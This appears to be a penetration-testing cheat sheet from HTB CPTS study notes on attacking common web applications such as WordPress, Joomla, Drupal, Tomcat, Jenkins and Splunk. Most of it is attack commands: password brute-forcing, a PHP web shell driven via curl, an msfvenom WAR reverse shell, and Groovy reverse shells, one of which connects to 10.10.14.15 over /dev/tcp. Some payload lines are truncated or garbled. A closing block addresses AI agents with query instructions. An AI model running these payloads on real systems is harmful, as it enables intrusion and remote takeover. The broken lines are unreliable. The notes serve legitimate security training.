# Common Applications | | | | --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ | | Command | Description | | `sudo vim /etc/hosts` | Opens the `/etc/hosts` with `vim` to start adding hostnames | | `sudo nmap -p 80,443,8000,8080,8180,8888,10000 --open -oA web_discovery -iL scope_list` | Runs an nmap scan using common web application ports based on a scope list (`scope_list`) and outputs to a file (`web_discovery`) in all formats (`-oA`) | | `eyewitness --web -x web_discovery.xml -d ` | Runs `eyewitness` using a file generated by an nmap scan (`web_discovery.xml`) and creates a directory (`-d`) | | `cat web_discovery.xml \| ./aquatone -nmap` | Concatenates the contents of nmap scan output (web\_discovery.xml) and pipes it to aquatone (`./aquatone`) while ensuring aquatone recognizes the file as nmap scan output (`-nmap`) | | `sudo wpscan --url --enumerate` | Runs wpscan using the `--enmuerate` flag. Can replace the url with any valid and reachable URL in each challenge | | `sudo wpscan --password-attack xmlrpc -t 20 -U john -P /usr/share/wordlists/rockyou.txt --url ` | Runs wpscan and uses it to perform a password attack (`--password-attack`) against the specified url and references a word list (`/usr/share/wordlists/rockyou.txt`) | | `curl -s http://& /dev/tcp// 0>&1'");` | PHP code that will execute a reverse shell on a Linux-based system | | `droopescan scan joomla --url http://` | Runs `droopescan` against a joomla site located at the specified url | | `sudo python3 joomla-brute.py -u http://dev.inlanefreight.local -w /usr/share/metasploit-framework/data/wordlists/http_default_pass.txt -usr ` | Runs joomla-brute.py tool with python3 against a specified url, utilizing a specified wordlist (`/usr/share/metasploit-framework/data/wordlists/http_default_pass.txt`) and user or list of usernames (`-usr`) | | `` | PHP code that will allow for web shell access on a vulnerable drupal site. Can be used through browisng to the location of the file in the web directory after saving. Can also be leveraged utilizing curl. See next command. | | `curl -s /node/3?dcfdd5e021a869fcc6dfaef8bf31377e=id \| grep uid \| cut -f4 -d">"` | Uses curl to navigate to php web shell file and run system commands (`=id`) on the target | | `gobuster dir -u -w /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt` | `gobuster` powered directory brute forcing attack refrencing a wordlist (`/usr/share/dirbuster/wordlists/directory-list-2.3-small.txt`) | | `auxiliary/scanner/http/tomcat_mgr_login` | Useful Metasploit scanner module used to perform a bruteforce login attack against a tomcat site | | `python3 mgr_brute.py -U -P /manager -u /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_users.txt -p /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_pass.txt` | Runs mgr\_brute.py using python3 against the specified website starts in the /manager directory (`-P /manager`) and references a specified user or userlist ( `-u`) as well as a specified password or password list (`-p`) | | `msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f war > backup.war` | Generates a jsp-based reverse shell payload in the form of a .war file utilizing `msfvenom` | | `nmap -sV -p 8009,8080 ` | Nmap scan useful in enumerating Apache Tomcat and AJP services | | `r = Runtime.getRuntime() p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.10.14.15/8443;cat <&5 \| while read line; do \$line 2>&5 >&5; done"] as String[]) p.waitFor()` | Groovy-based reverse shell payload/code that can work with admin access to the `Script Console` of a `Jenkins` site. Will work when the underlying OS is Linux | | `def cmd = "cmd.exe /c dir".execute(); println("${cmd.text}");` | Groovy-based payload/code that can work with admin access to the `Script Console` of a `Jenkins` site. This will allow webshell access and to execute commands on the underlying Windows system | | `String host="localhost"; int port=8044; String cmd="cmd.exe"; Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new So);` | Groovy-based reverse shell payload/code that can work with admin acess to the `Script Console` of a `Jenkins`site. Will work when the underlying OS is Windows | | [reverse\_shell\_splunk](https://github.com/0xjpuff/reverse_shell_splunk) | A simple Splunk package for obtaining revershells on Windows and Linux systems | | | |
--- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://gabb4r.gitbook.io/htb-cpts/common-applications.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.